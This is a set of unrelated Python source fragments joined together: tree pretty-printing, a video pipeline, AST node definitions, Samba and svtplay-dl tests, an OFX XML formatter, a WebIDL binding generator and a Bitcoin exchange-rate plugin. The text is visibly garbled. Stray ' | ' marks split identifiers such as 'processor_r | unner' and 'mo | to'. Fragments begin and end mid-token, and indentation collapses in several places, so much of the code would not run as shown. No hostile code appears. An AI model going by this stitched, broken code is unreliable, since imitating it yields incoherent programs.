        _canvas_frame.canvas()['scrollregion'] = (0, 0, w, h)
        with tempfile.NamedTemporaryFile() as file:
            # Only the temp file's *name* is used, as the base for the
            # intermediate .ps and final .png paths.
            in_path = '{0:}.ps'.format(file.name)
            out_path = '{0:}.png'.format(file.name)
            _canvas_frame.print_to_file(in_path)
            _canvas_frame.destroy_widget(widget)
            # find_binary also knows the Windows ghostscript executable names.
            subprocess.call([find_binary('gs', binary_names=['gswin32c.exe', 'gswin64c.exe'], env_vars=['PATH'], verbose=False)] +
                            '-q -dEPSCrop -sDEVICE=png16m -r90 -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -dSAFER -dBATCH -dNOPAUSE -sOutputFile={0:} {1:}'
                            .format(out_path, in_path).split())
            with open(out_path, 'rb') as sr:
                res = sr.read()
            os.remove(in_path)
            os.remove(out_path)
        return base64.b64encode(res).decode()
    def __str__(self):
        # str(tree) is the (possibly multi-line) bracketed form from pformat().
        return self.pformat()
def pprint(self, **kwargs):
"""
Print a string representation of this Tree to 'stream'
"""
if "stream" in kwargs:
stream = kwargs["stream"]
del kwargs["stream"]
else:
stream = None
print(self.pformat(**kwargs), file=stream)
    def pformat(self, margin=70, indent=0, nodesep='', parens='()', quotes=False):
        """
        :return: A pretty-printed string representation of this tree.
        :rtype: str
        :param margin: The right margin at which to do line-wrapping.
        :type margin: int
        :param indent: The indentation level at which printing
            begins. This number is used to decide how far to indent
            subsequent lines.
        :type indent: int
        :param nodesep: A string that is used to separate the node
            from the children. E.g., the default value ``':'`` gives
            trees like ``(S: (NP: I) (VP: (V: saw) (NP: it)))``.
        :param parens: A two-element sequence giving the opening and
            closing bracket characters, e.g. ``'()'`` or ``'[]'``.
        :param quotes: If true, string leaves are rendered via repr
            instead of verbatim.
        """
        # Try writing it on one line.
        s = self._pformat_flat(nodesep, parens, quotes)
        if len(s) + indent < margin:
            return s
        # If it doesn't fit on one line, then write it on multi-lines.
        if isinstance(self._label, string_types):
            s = '%s%s%s' % (parens[0], self._label, nodesep)
        else:
            s = '%s%s%s' % (parens[0], unicode_repr(self._label), nodesep)
        for child in self:
            if isinstance(child, Tree):
                # Recurse with increased indent so siblings line up.
                s += '\n'+' '*(indent+2)+child.pformat(margin, indent+2,
                                                       nodesep, parens, quotes)
            elif isinstance(child, tuple):
                # A (word, tag) pair is rendered as word/tag.
                s += '\n'+' '*(indent+2)+ "/".join(child)
            elif isinstance(child, string_types) and not quotes:
                s += '\n'+' '*(indent+2)+ '%s' % child
            else:
                s += '\n'+' '*(indent+2)+ unicode_repr(child)
        return s+parens[1]
def pformat_latex_qtree(self):
r"""
Returns a representation of the tree compatible with the
LaTeX qtree package. This consists of the string ``\Tree``
followed by the tree represented in bracketed notation.
For example, the following result was generated from a parse tree of
the sentence ``The announcement astounded us``::
\Tree [.I'' [.N'' [.D The ] [.N' [.N announcement ] ] ]
[.I' [.V'' [.V' [.V astounded ] [.N'' [.N' [.N us ] ] ] ] ] ] ]
See http://www.ling.upenn.edu/advice/latex.html for the LaTeX
style file for the qtree package.
:return: A latex qtree representation of this tree.
:rtype: str
"""
reserved_chars = re.compile('([#\$%&~_\{\}])')
pformat = self.pformat(indent=6, nodesep='', parens=('[.', ' ]'))
return r'\Tree ' + re.sub(reserved_chars, r'\\\1', pformat)
    def _pformat_flat(self, nodesep, parens, quotes):
        """Single-line rendering used by pformat() when the tree fits the margin."""
        childstrs = []
        for child in self:
            if isinstance(child, Tree):
                childstrs.append(child._pformat_flat(nodesep, parens, quotes))
            elif isinstance(child, tuple):
                # A (word, tag) pair is rendered as word/tag.
                childstrs.append("/".join(child))
            elif isinstance(child, string_types) and not quotes:
                childstrs.append('%s' % child)
            else:
                childstrs.append(unicode_repr(child))
        if isinstance(self._label, string_types):
            return '%s%s%s %s%s' % (parens[0], self._label, nodesep,
                                    " ".join(childstrs), parens[1])
        else:
            return '%s%s%s %s%s' % (parens[0], unicode_repr(self._label), nodesep,
                                    " ".join(childstrs), parens[1])
class ImmutableTree(Tree):
    def __init__(self, node, children=None):
        """Build an immutable tree and cache its hash.

        Raises ValueError when the label or any child is unhashable.
        """
        super(ImmutableTree, self).__init__(node, children)
        # Precompute our hash value. This ensures that we're really
        # immutable. It also means we only have to calculate it once.
        try:
            self._hash = hash((self._label, tuple(self)))
        except (TypeError, ValueError):
            raise ValueError("%s: node value and children "
                             "must be immutable" % type(self).__name__)
    # All mutating list operations are disabled: the hash is precomputed in
    # __init__, so any in-place modification would silently corrupt it.
    def __setitem__(self, index, value):
        raise ValueError('%s may not be modified' % type(self).__name__)
    def __setslice__(self, i, j, value):
        raise ValueError('%s may not be modified' % type(self).__name__)
    def __delitem__(self, index):
        raise ValueError('%s may not be modified' % type(self).__name__)
    def __delslice__(self, i, j):
        raise ValueError('%s may not be modified' % type(self).__name__)
    def __iadd__(self, other):
        raise ValueError('%s may not be modified' % type(self).__name__)
    def __imul__(self, other):
        raise ValueError('%s may not be modified' % type(self).__name__)
    def append(self, v):
        raise ValueError('%s may not be modified' % type(self).__name__)
    def extend(self, v):
        raise ValueError('%s may not be modified' % type(self).__name__)
def pop(self, v=None):
raise ValueError('%s may not be modified' % type(self).__name |
# Copyright 2019 Google LLC.
"""Pipeline to decode and reencode a video using OpenCV."""
from absl import app
from absl import flags
from video_processing import processor_r | unner
from video_processing.processors import opencv_video_decoder
from video_processing.processors import opencv_video_encoder
flags.DEFINE_string('input_ | video_file', '', 'Input file.')
flags.DEFINE_string('output_video_file', '', 'Output file.')
FLAGS = flags.FLAGS
def pipeline(input_video_file, output_video_file):
    """Build the two-stage decode -> re-encode processor chain."""
    decoder = opencv_video_decoder.OpenCVVideoDecoderProcessor(
        {'input_video_file': input_video_file})
    encoder = opencv_video_encoder.OpenCVVideoEncoderProcessor(
        {'output_video_file': output_video_file})
    return [decoder, encoder]
def main(unused_argv):
    # absl.app entry point: wire the --input_video_file/--output_video_file
    # flags into the decode/re-encode pipeline and run it.
    processor_runner.run_processor_chain(
        pipeline(FLAGS.input_video_file, FLAGS.output_video_file))
if __name__ == '__main__':
app.run(main)
|
import boto
import sure # noqa
from mo | to import mock_ec2 |
@mock_ec2
def test_placement_groups():
    # Placeholder: no placement-group API calls are exercised yet. This
    # currently only verifies that @mock_ec2 applies cleanly to an empty test.
    pass
|
ts: (list of :class:`AST`) elements
"""
_fields = ("elts", "ctx")
class ListComp(expr, beginendloc):
"""
A list comprehension, e.g. ``[x for x in y]``.
:ivar elt: (:class:`AST`) comprehension body
:ivar generators: (list of :class:`comprehension`) ``for`` clauses
"""
_fields = ("elt", "generators")
class Name(expr):
"""
An identifier, e.g. ``x``.
:ivar id: (string) name
"""
_fields = ("id", "ctx")
class NameConstant(expr):
"""
A named constant, e.g. ``None``.
:ivar value: Python value, one of ``None``, ``True`` or ``False``
"""
_fields = ("value",)
class Num(expr):
"""
An integer, floating point or complex number, e.g. ``1``, ``1.0`` or ``1.0j``.
:ivar n: (int, float or complex) value
"""
_fields = ("n",)
class Repr(expr, beginendloc):
"""
A repr operation, e.g. ``\`x\```
**Emitted until 3.0.**
:ivar value: (:class:`AST`) value
"""
_fields = ("value",)
class Set(expr, beginendloc):
"""
A set, e.g. ``{x, y}``.
**Emitted since 2.7.**
:ivar elts: (list of :class:`AST`) elements
"""
_fields = ("elts",)
class SetComp(expr, beginendloc):
"""
A set comprehension, e.g. ``{x for x in y}``.
**Emitted since 2.7.**
:ivar elt: (:class:`AST`) comprehension body
:ivar generators: (list of :class:`comprehension`) ``for`` clauses
"""
_fields = ("elt", "generators")
class Str(expr, beginendloc):
"""
A string, e.g. ``"x"``.
:ivar s: (string) value
"""
_fields = ("s",)
class Starred(expr):
"""
A starred expression, e.g. ``*x`` in ``*x, y = z``.
:ivar value: (:class:`AST`) expression
:ivar star_loc: location of ``*``
"""
_fields = ("value", "ctx")
_locs = expr._locs + ("star_loc",)
class Subscript(expr, beginendloc):
"""
A subscript operation, e.g. ``x[1]``.
:ivar value: (:class:`AST`) object being sliced
:ivar slice: (:class:`slice`) slice
"""
_fields = ("value", "slice", "ctx")
class Tuple(expr, beginendloc):
"""
A tuple, e.g. ``(x,)`` or ``x,y``.
:ivar elts: (list of nodes) elements
"""
_fields = ("elts", "ctx")
cl | ass UnaryOp(expr):
"""
An unary operation, e.g. ``+x``.
:ivar op: (:class:`unaryop`) o | perator
:ivar operand: (:class:`AST`) operand
"""
_fields = ("op", "operand")
class Yield(expr):
"""
A yield expression, e.g. ``yield x``.
:ivar value: (:class:`AST`) yielded value
:ivar yield_loc: location of ``yield``
"""
_fields = ("value",)
_locs = expr._locs + ("yield_loc",)
class YieldFrom(expr):
"""
A yield from expression, e.g. ``yield from x``.
:ivar value: (:class:`AST`) yielded value
:ivar yield_loc: location of ``yield``
:ivar from_loc: location of ``from``
"""
_fields = ("value",)
_locs = expr._locs + ("yield_loc", "from_loc")
# expr_context
# AugLoad
# AugStore
# Del
# Load
# Param
# Store
class keyword(AST, commonloc):
"""
A keyword actual argument, e.g. in ``f(x=1)``.
:ivar arg: (string) name
:ivar value: (:class:`AST`) value
:ivar equals_loc: location of ``=``
"""
_fields = ("arg", "value")
_locs = commonloc._locs + ("arg_loc", "equals_loc")
class mod(AST, commonloc):
"""Base class for modules (groups of statements)."""
_fields = ("body",)
class Expression(mod):
"""A group of statements parsed as if for :func:`eval`."""
class Interactive(mod):
"""A group of statements parsed as if it was REPL input."""
class Module(mod):
"""A group of statements parsed as if it was a file."""
class operator(AST, commonloc):
    """Base class for numeric binary operators."""
class Add(operator):
    """The ``+`` operator."""
class BitAnd(operator):
    """The ``&`` operator."""
class BitOr(operator):
    """The ``|`` operator."""
class BitXor(operator):
    """The ``^`` operator."""
class Div(operator):
    """The ``/`` operator."""
class FloorDiv(operator):
    """The ``//`` operator."""
class LShift(operator):
    """The ``<<`` operator."""
class MatMult(operator):
    """The ``@`` operator."""
class Mod(operator):
    """The ``%`` operator."""
class Mult(operator):
    """The ``*`` operator."""
class Pow(operator):
    """The ``**`` operator."""
class RShift(operator):
    """The ``>>`` operator."""
class Sub(operator):
    """The ``-`` operator."""
class slice(AST, commonloc):
    """Base class for slice operations."""
class ExtSlice(slice):
    """
    The multiple slice, e.g. in ``x[0:1, 2:3]``.
    Note that multiple slices with only integer indexes
    will appear as instances of :class:`Index`.
    :ivar dims: (:class:`slice`) sub-slices
    """
    _fields = ("dims",)
class Index(slice):
    """
    The index, e.g. in ``x[1]`` or ``x[1, 2]``.
    :ivar value: (:class:`AST`) index
    """
    _fields = ("value",)
class Slice(slice):
    """
    The slice, e.g. in ``x[0:1]`` or ``x[0:1:2]``.
    :ivar lower: (:class:`AST`) lower bound, if any
    :ivar upper: (:class:`AST`) upper bound, if any
    :ivar step: (:class:`AST`) iteration step, if any
    :ivar bound_colon_loc: location of the first colon
    :ivar step_colon_loc: location of the second colon, if any
    """
    _fields = ("lower", "upper", "step")
    _locs = slice._locs + ("bound_colon_loc", "step_colon_loc")
class stmt(AST, commonloc):
"""Base class for statement nodes."""
class Assert(stmt, keywordloc):
"""
The ``assert x, msg`` statement.
:ivar test: (:class:`AST`) condition
:ivar msg: (:class:`AST`) message, if any
"""
_fields = ("test", "msg")
class Assign(stmt):
"""
The ``=`` statement, e.g. in ``x = 1`` or ``x = y = 1``.
:ivar targets: (list of assignable :class:`AST`) left-hand sides
:ivar value: (:class:`AST`) right-hand side
:ivar op_locs: location of equality signs corresponding to ``targets``
"""
_fields = ("targets", "value")
_locs = stmt._locs + ("op_locs",)
class AugAssign(stmt):
"""
The operator-assignment statement, e.g. ``+=``.
:ivar target: (assignable :class:`AST`) left-hand side
:ivar op: (:class:`operator`) operator
:ivar value: (:class:`AST`) right-hand side
"""
_fields = ("target", "op", "value")
class Break(stmt, keywordloc):
"""The ``break`` statement."""
class ClassDef(stmt, keywordloc):
"""
The ``class x(z, y):· t`` (2.6) or
``class x(y, z=1, *t, **u):· v`` (3.0) statement.
:ivar name: (string) name
:ivar bases: (list of :class:`AST`) base classes
:ivar keywords: (list of :class:`keyword`) keyword arguments; **emitted since 3.0**
:ivar starargs: (:class:`AST`) splat argument (if any), e.g. in ``*x``; **emitted since 3.0**
:ivar kwargs: (:class:`AST`) keyword splat argument (if any), e.g. in ``**x``; **emitted since 3.0**
:ivar body: (list of :class:`AST`) body
:ivar decorator_list: (list of :class:`AST`) decorators
:ivar keyword_loc: location of ``class``
:ivar name_loc: location of name
:ivar lparen_loc: location of ``(``, if any
:ivar star_loc: location of ``*``, if any; **emitted since 3.0**
:ivar dstar_loc: location of ``**``, if any; **emitted since 3.0**
:ivar rparen_loc: location of ``)``, if any
:ivar colon_loc: location of ``:``
:ivar at_locs: locations of decorator ``@``
"""
_fields = ("name", "bases", "keywords", "starargs", "kwargs", "body", "decorator_list")
_locs = keywordloc._locs + ("name_loc", "lparen_loc", "star_loc", "dstar_loc", "rparen_loc",
"colon_loc", "at_locs")
class Continue(stmt, keywordloc):
"""The ``continue`` statement."""
class Delete(stmt, keywordloc):
"""
The ``del x, y`` statement.
:ivar targets: (list of :class:`Name`)
"""
_fields = ("targets",)
class Exec(stmt, keywordloc):
"""
The ``exec code in locals, globals`` statement.
**Emitted until 3.0.**
:ivar body: (:class:`AST`) code
:ivar locals: (:class:`AST`) locals
:ivar globals: (:class:`AST`) globals
:ivar keyword_loc: location of ``exec``
:ivar in_loc: l |
#! /usr/bin/env python
# @brief Script to run appropriate tests.
import os
import distutils.core
from shutil import rmtree, copyfile
"""Avaiable tests dictionary in the format no_of_test : name_of_test"""
tests = {0:"default Generator.dat with lot of comments and explanations",
1:"RHIC pt_pi, eta_pi; tecm = 200GeV; Lambda2=1",
2:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1",
3:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6",
4:"RHIC pt_pi, eta_pi; tecm = 500GeV; Lambda2=1",
5:"RHIC pt_pi, eta_pi, t1, t2; tecm = 500GeV; Lambda2=1",
6:"RHIC pt_pi, eta_pi, t1, t2; tecm = 500GeV; Lambda2=1.6",
7:"LHC pt_pi, eta_pi; tecm = 7TeV, 1st; Lambda2=1.2",
8:"LHC pt_pi, eta_pi; tecm = 7TeV, 1st; Lambda2=1.6",
9:"LHC pt_pi, eta_pi; tecm = 7TeV, 2nd; Lambda2=1.2",
10:"LHC pt_pi, eta_pi; tecm = 7TeV, 2nd; Lambda2=1.6",
11:"LHC pt_K, eta_K; tecm = 7TeV, 1st; Lambda2=1.2",
12:"LHC pt_K, eta_K; tecm = 7TeV, 1st; Lambda2=1.6",
13:"LHC pt_K, eta_K; tecm = 7TeV, 2nd; Lambda2=1.2",
14:"LHC pt_K, eta_K; tecm = 7TeV, 2nd; Lambda2=1.6",
15:"2to5; y_pi, tecm = 200GeV",
16:"CPS, N=5, y_pi, tecm = 200GeV",
17:"2to5; y_pi, t, tecm = 200GeV",
18:"CPS, N=5, y_pi, t, tecm = 200GeV",
19:"CPS, N=5, Exploration Cuts, y_pi, t, tecm = 200GeV",
20:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; LS method of Phase Space generation",
21:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; 2toN (N=4) method of Phase Space generation",
22:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 1000 = nSampl, y in [-8;8]",
23:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 1000, y in [-8;8]",
24:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 10000, y in [-8;8]",
25:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 1000, y in [-2;2]",
26:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000 = nSampl, y in [-2;2]"
}
def prepareTest(number, testDir='./Tests', testName='test', configFile='Generator.dat'):
    """Prepare configuration file by picking one of the test files from testDir
    @param number number of the test configuration to select
    @param testDir dir containing tests
    @param testName basename of test
    @param configFile configuration file for generator
    """
    # Keep a backup of the current configuration before overwriting it.
    copyfile(configFile, "OLD" + configFile)
    # Copy the selected test's configuration into place.
    selectedConfig = "%s/%s%s" % (testDir, testName, str(number))
    copyfile(selectedConfig, configFile)
    return testDir
def rmDir(directory="./"):
    """Remove directory and all its content
    @param directory base directory for project
    """
    # Delegates to shutil.rmtree; note the default removes the CWD tree.
    rmtree(directory)
def runMake(option, runDir='./'):
    """Run make with option in given directory
    @param option option for make (e.g. 'run' or 'clean')
    @param runDir directory in which make will be executed
    """
    import subprocess
    # An argument list with shell=False avoids the quoting/injection issues
    # of the previous os.system() string concatenation.
    subprocess.call(['make', '-C', runDir, option])
def showTests(testDict):
    """Show tests in dictionary
    @param testDict dictionary with tests in the format no_of_test : name_of_test
    """
    separator = "#########################"
    print(separator)
    print("AVAIBLE TESTS:")
    print(separator)
    for number, description in testDict.items():
        print(str(number) + ' -- ' + str(description))
    print(separator)
def pickTest(testDict):
    """Allows user to pick option from the keys of dictionary and returns it
    @param testDict dictionary with tests in the format no_of_test : name_of_test
    """
    while True:
        showTests(testDict)
        entered = input("Enter option: ")
        print("you entered " + str(entered))
        # Under Python 3, input() returns a string while the dictionary keys
        # are ints, so the original membership test could never succeed and
        # the prompt looped forever. Convert before testing membership.
        try:
            choice = int(entered)
        except ValueError:
            continue
        if choice in testDict:
            return choice
def main():
    """Simple test suite for GenEx. It copies Core GenEx files and selected
    configuration files to one test directory and then runs it and removes the test directory"""
    testNo = pickTest(tests)
    print("Preparing generator...")
    prepareTest(testNo)
    print("...DONE")
    print("Start test...")
    # 'make run' builds and executes the generator with the prepared config.
    runMake('run')
    print("...DONE")
    print("Cleaning dir...")
    runMake('clean')
    print("...DONE")
if __name__ == "__main__":
main()
|
#!/usr/bin/python
# ex:ts=4:sw=4:sts=4:et
# -*- tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*-
# The unittest framwork doesn't play nice with pylint:
# pylint: disable-msg=C0103
from __future__ import absolute_impor | t
import unittest
from svtplay_dl.service.oppetarkiv import OppetArkiv
from svtplay_dl.service.tests import HandlesURLsTestMixin
class handlesTest(unittest.TestCase, HandlesURLsTestMixin):
    # NOTE(review): HandlesURLsTestMixin presumably generates handles()-checks
    # from `urls` ("ok" URLs accepted, "bad" rejected) — verify against mixin.
    service = OppetArkiv
    urls = {"ok": ["http://www.oppetarkiv.se/video/1129844/jacobs-stege-avsnitt-1-av-1"], "bad": ["http://www.svtplay.se/video/1090393/del-9"]}
|
#!/usr/bin/env python
# Unix SMB/CIFS implementation.
# Copyright (C) Jelmer Vernooij <jelmer@samba.org> 2007-2008
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Samba Python tests."""
import ldb
import os
import samba
from samba.tests import TestCase, TestCaseInTempDir
class SubstituteVarTestCase(TestCase):
    """Tests for samba.substitute_var and samba.check_all_substituted."""
    def test_empty(self):
        # assertEqual: assertEquals is a deprecated alias in unittest.
        self.assertEqual("", samba.substitute_var("", {}))
    def test_nothing(self):
        self.assertEqual("foo bar",
            samba.substitute_var("foo bar", {"bar": "bla"}))
    def test_replace(self):
        self.assertEqual("foo bla",
            samba.substitute_var("foo ${bar}", {"bar": "bla"}))
    def test_broken(self):
        # An unterminated ${ reference is passed through unchanged.
        self.assertEqual("foo ${bdkjfhsdkfh sdkfh ",
            samba.substitute_var("foo ${bdkjfhsdkfh sdkfh ", {"bar": "bla"}))
    def test_unknown_var(self):
        # Unknown variables are left in place rather than raising.
        self.assertEqual("foo ${bla} gsff",
            samba.substitute_var("foo ${bla} gsff", {"bar": "bla"}))
    def test_check_all_substituted(self):
        samba.check_all_substituted("nothing to see here")
        self.assertRaises(Exception, samba.check_all_substituted,
            "Not subsituted: ${FOOBAR}")
class LdbExtensionTests(TestCaseInTempDir):
    """Tests for the samba.Ldb convenience wrapper."""
    def test_searchone(self):
        path = self.tempdir + "/searchone.ldb"
        l = samba.Ldb(path)
        try:
            l.add({"dn": "foo=dc", "bar": "bla"})
            # assertEqual: assertEquals is a deprecated alias in unittest.
            self.assertEqual("bla",
                l.searchone(basedn=ldb.Dn(l, "foo=dc"), attribute="bar"))
        finally:
            # Drop the database handle before deleting the backing file.
            del l
            os.unlink(path)
|
#coding: utf-8
# Copyright 2005-2010 Wesabe, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ofx.document - abstract OFX document.
#
import xml.sax.saxutils as sax
class Document:
    """Abstract OFX document that can re-render itself as OFX 2.0 XML."""
    def as_xml(self, original_format=None, date_format=None):
        """Formats this document as an OFX 2.0 XML document.

        Requires ``self.parse_dict`` to hold a "header" mapping (SECURITY,
        OLDFILEUID, NEWFILEUID) and a parsed "body" — presumably populated
        by an OFX parser elsewhere; verify against callers.
        """
        xml = ""
        # NOTE: Encoding in OFX, particularly in OFX 1.02, is a mess: the
        # 1.02 spec's "UNICODE" was back-rationalized to "UTF-8" by 2.0,
        # "US-ASCII" appears as "USASCII", and arbitrary encodings are
        # allowed. We simply force UTF-8 (a superset of US-ASCII) here.
        #forcing encoding to utf-8
        encoding = "UTF-8"
        xml += """<?xml version="1.0" encoding="%s"?>\n""" % encoding
        xml += """<?OFX OFXHEADER="200" VERSION="200" """ + \
               """SECURITY="%s" OLDFILEUID="%s" NEWFILEUID="%s"?>\n""" % \
               (self.parse_dict["header"]["SECURITY"],
                self.parse_dict["header"]["OLDFILEUID"],
                self.parse_dict["header"]["NEWFILEUID"])
        if original_format is not None:
            xml += """<!-- Converted from: %s -->\n""" % original_format
        if date_format is not None:
            xml += """<!-- Date format was: %s -->\n""" % date_format
        taglist = self.parse_dict["body"]["OFX"][0].asList()
        xml += self._format_xml(taglist)
        return xml
    def _format_xml(self, mylist, indent=0):
        """Recursively render a ``[tag, child, ...]`` parse list as XML.

        Unlike the previous implementation, this does not pop() items off
        the caller's list, so the input structure is left intact.
        """
        indentstring = " " * indent
        tag, children = mylist[0], mylist[1:]
        xml = ""
        if children and isinstance(children[0], list):
            xml += "%s<%s>\n" % (indentstring, tag)
            for value in children:
                xml += self._format_xml(value, indent=indent + 2)
            xml += "%s</%s>\n" % (indentstring, tag)
        elif children:
            # Unescape then reescape so we don't wind up with '&amp;lt;', oy.
            value = sax.escape(sax.unescape(children[0]))
            xml += "%s<%s>%s</%s>\n" % (indentstring, tag, value, tag)
        return xml
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import cPickle
import WebIDL
from Configuration import *
from Codegen import CGBindingRoot, replaceFileIfChanged
# import Codegen in general, so we can set a variable on it
import Codegen
def generate_binding_header(config, outputprefix, webidlfile):
"""
|config| Is the configuration object.
|outputprefix| is a prefix to use for the header guards and filename.
"""
filename = outputprefix + ".h"
root = CGBindingRoot(config, outputprefix, webidl | file)
if replaceFileIfChanged(filename, root.declare()) | :
print "Generating binding header: %s" % (filename)
def generate_binding_cpp(config, outputprefix, webidlfile):
"""
|config| Is the configuration object.
|outputprefix| is a prefix to use for the header guards and filename.
"""
filename = outputprefix + ".cpp"
root = CGBindingRoot(config, outputprefix, webidlfile)
if replaceFileIfChanged(filename, root.define()):
print "Generating binding implementation: %s" % (filename)
def main():
    """Command-line driver: generate a binding header or implementation.

    Usage: [header|cpp] configFile outputPrefix webIDLFile
    """
    # Parse arguments.
    from optparse import OptionParser
    usagestring = "usage: %prog [header|cpp] configFile outputPrefix webIDLFile"
    o = OptionParser(usage=usagestring)
    o.add_option("--verbose-errors", action='store_true', default=False,
                 help="When an error happens, display the Python traceback.")
    (options, args) = o.parse_args()
    if len(args) != 4 or (args[0] != "header" and args[0] != "cpp"):
        o.error(usagestring)
    buildTarget = args[0]
    configFile = os.path.normpath(args[1])
    outputPrefix = args[2]
    webIDLFile = os.path.normpath(args[3])
    # Load the parsing results
    # NOTE(review): cPickle.load on a build artifact — assumed trusted input.
    f = open('ParserResults.pkl', 'rb')
    parserData = cPickle.load(f)
    f.close()
    # Create the configuration data.
    config = Configuration(configFile, parserData)
    # Generate the prototype classes.
    if buildTarget == "header":
        generate_binding_header(config, outputPrefix, webIDLFile);
    elif buildTarget == "cpp":
        generate_binding_cpp(config, outputPrefix, webIDLFile);
    else:
        assert False # not reached
if __name__ == '__main__':
main()
|
currencies/exchange_rates")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp:
if r[:7] == "btc_to_":
quote_currencies[r[7:].upper()] = self._lookup_rate_cb(jsonresp, r)
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
def update_bc(self):
try:
jsonresp = self.get_json('blockchain.info', "/ticker")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp:
quote_currencies[r] = self._lookup_rate(jsonresp, r)
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
# print "updating exchange rate", self.quote_currencies["USD"]
def update_lb(self):
try:
jsonresp = self.get_json('localbitcoins.com', "/bitcoinaverage/ticker-all-currencies/")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp:
quote_currencies[r] = self._lookup_rate_lb(jsonresp, r)
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
def update_bv(self):
try:
jsonresp = self.get_json('api.bitcoinvenezuela.com', "/")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp["BTC"]:
quote_currencies[r] = Decimal(jsonresp["BTC"][r])
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
def update_ba(self):
    """Refresh quotes from BitcoinAverage; 'timestamp' is metadata, not a currency."""
    try:
        payload = self.get_json('api.bitcoinaverage.com', "/ticker/global/all")
    except Exception:
        return
    rates = {}
    try:
        for code in payload:
            if code == "timestamp":
                continue
            rates[code] = self._lookup_rate_ba(payload, code)
        with self.lock:
            self.quote_currencies = rates
    except KeyError:
        pass
    self.parent.set_currencies(rates)
def get_currencies(self):
    """Return the known currency codes, sorted.

    Returns an empty list while no quotes have been fetched yet. Uses
    ``is None`` (identity) instead of the original ``== None`` comparison.
    """
    if self.quote_currencies is None:
        return []
    return sorted(self.quote_currencies.keys())
def _lookup_rate(self, response, quote_id):
return decimal.Decimal(str(response[str(quote_id)]["15m"]))
def _lookup_rate_cb(self, response, quote_id):
return decimal.Decimal(str(response[str(quote_id)]))
def _lookup_rate_ba(self, response, quote_id):
return decimal.Decimal(response[str(quote_id)]["last"])
def _lookup_rate_lb(self, response, quote_id):
return decimal.Decimal(response[str(quote_id)]["rates"]["last"])
class Plugin(BasePlugin):
def fullname(self):
    """Display name of this plugin."""
    return "Exchange rates"
def description(self):
    """Short blurb shown in the plugin list."""
    return """exchange rates, retrieved from blockchain.info, CoinDesk, or Coinbase"""
def __init__(self, a, b):
    """Initialise base plugin state and seed the currency/exchange choices.

    Defaults come from saved config: currency "EUR", exchange "Blockchain".
    """
    BasePlugin.__init__(self, a, b)
    # Single-element lists holding the currently configured choices;
    # self.currencies is presumably widened later by set_currencies() — confirm.
    self.currencies = [self.config.get('currency', "EUR")]
    self.exchanges = [self.config.get('use_exchange', "Blockchain")]
def init(self):
    """Wire the plugin into the main window and start the rate poller."""
    self.win = self.gui.main_window
    # Repaint the status bar whenever new rates arrive.
    self.win.connect(self.win, SIGNAL("refresh_currencies()"), self.win.update_status)
    self.btc_rate = Decimal(0.0)
    # Do price discovery in a background thread.
    self.exchanger = Exchanger(self)
    self.exchanger.start()
    # Expose the exchanger on the GUI object for other components.
    self.gui.exchanger = self.exchanger
def set_currencies(self, currency_options):
    """Store the freshly fetched currency codes and ask the GUI to redraw."""
    codes = sorted(currency_options)
    self.currencies = codes
    # Refresh both the status bar and the currency combo box.
    self.win.emit(SIGNAL("refresh_currencies()"))
    self.win.emit(SIGNAL("refresh_currencies_combo()"))
def set_quote_text(self, btc_balance, r):
    """Write the fiat quote for *btc_balance* (in satoshis) into r[0]."""
    btc = Decimal(btc_balance) / 100000000
    r[0] = self.create_quote_text(btc)
def create_quote_text(self, btc_balance):
    """Format *btc_balance* (BTC) in the configured fiat currency.

    Returns '' while no exchange rate is available; otherwise caches the
    rate on self.btc_rate and returns e.g. '6.00 EUR'.
    """
    fiat = self.config.get("currency", "EUR")
    self.exchanger.use_exchange = self.config.get("use_exchange", "Blockchain")
    rate = self.exchanger.exchange(Decimal(1.0), fiat)
    if rate is None:
        return ""
    self.btc_rate = rate
    return "%.2f %s" % (btc_balance * Decimal(rate), fiat)
def load_wallet(self, wallet):
    """Cache value/timestamp/balance per transaction hash for the active account."""
    self.wallet = wallet
    account = self.wallet.storage.get("current_account", None)
    self.tx_list = {
        tx_hash: {'value': value, 'timestamp': timestamp, 'balance': balance}
